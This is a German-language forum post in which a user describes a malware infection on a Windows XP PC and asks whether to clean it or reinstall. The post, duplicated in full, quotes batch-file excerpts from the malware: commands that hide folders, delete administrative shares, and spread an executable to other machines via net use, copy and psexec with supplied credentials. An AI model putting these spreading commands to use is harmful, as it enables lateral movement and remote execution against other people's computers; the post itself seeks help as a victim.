unforgettable
Bekanntes Mitglied
- Dabei seit
- 24.09.2000
- Beiträge
- 1.025
- Reaktionspunkte
- 0
ich hatte auf meinen PC ein MIRC-Popup-Fenster, obwohl ich diese Software gar nicht verwende und seither habe ich jede menge Trojaner-Meldungen:
- W32/Agent.IHM
- W32/ServU.5_OE
- W32/IRCFlood.EY
- W32/Hackmoo.A
und alle verweisen auf div. Dateien unter c:\winnt\system32\os was mir schon seltsam vorkam, da ich winXP habe und somit kein winnt-verzeichnis habe sondern c:\windows.
in diesem winnt-verzeichnis hatte es jede menge bat-dateien, ich poste kurz ein paar auszüge davon, kann damit nicht viel anfangen:
attrib +r +h +s iL.dbx
attrib +r +h +s c:\winnt
attrib +r +h +s c:\winnt\system32
attrib +r +h +s c:\winnt\system32\os
devcheck.exe /n /fh /r "lock.bat"
net share /delete IPC$ /y
net share /delete ADMIN$ /y
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net use \\%1\C$ "%3" "/user:%2"
md \\%1\C$\winnt\system32\os
copy KAHOL.exe \\%1\C$\winnt\system32\os
psexec \\%1 -u "%2" -p "%3" -d "c:\winnt\system32\os\KAHOL.exe"
auch geht bei der windowsanmeldung ein dosfenster auf in der die datei kill.exe ausgeführt wird.
ich habe dann im abgesicherten Modus die Systemwiederherstellung deaktivert, das ganze verzeichnis winnt gelöscht, mit hijackthis, ad-aware und norman antivirus alles abgescannt und dachte eigentlich es währe somit erledigt.
nun, zwei tage später bekomme ich wieder meldungen über
- W32/Suspicions_T.gen
- SDBot.gen8
die nun alle ins richtige windows\system32 verweisen.
kann ich diese trojaner oder was ich alles habe noch loswerden oder am besten gleich den PC neu aufsetzen?
- W32/Agent.IHM
- W32/ServU.5_OE
- W32/IRCFlood.EY
- W32/Hackmoo.A
und alle verweisen auf div. Dateien unter c:\winnt\system32\os was mir schon seltsam vorkam, da ich winXP habe und somit kein winnt-verzeichnis habe sondern c:\windows.
in diesem winnt-verzeichnis hatte es jede menge bat-dateien, ich poste kurz ein paar auszüge davon, kann damit nicht viel anfangen:
attrib +r +h +s iL.dbx
attrib +r +h +s c:\winnt
attrib +r +h +s c:\winnt\system32
attrib +r +h +s c:\winnt\system32\os
devcheck.exe /n /fh /r "lock.bat"
net share /delete IPC$ /y
net share /delete ADMIN$ /y
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net use \\%1\C$ "%3" "/user:%2"
md \\%1\C$\winnt\system32\os
copy KAHOL.exe \\%1\C$\winnt\system32\os
psexec \\%1 -u "%2" -p "%3" -d "c:\winnt\system32\os\KAHOL.exe"
auch geht bei der windowsanmeldung ein dosfenster auf in der die datei kill.exe ausgeführt wird.
ich habe dann im abgesicherten Modus die Systemwiederherstellung deaktivert, das ganze verzeichnis winnt gelöscht, mit hijackthis, ad-aware und norman antivirus alles abgescannt und dachte eigentlich es währe somit erledigt.
nun, zwei tage später bekomme ich wieder meldungen über
- W32/Suspicions_T.gen
- SDBot.gen8
die nun alle ins richtige windows\system32 verweisen.
kann ich diese trojaner oder was ich alles habe noch loswerden oder am besten gleich den PC neu aufsetzen?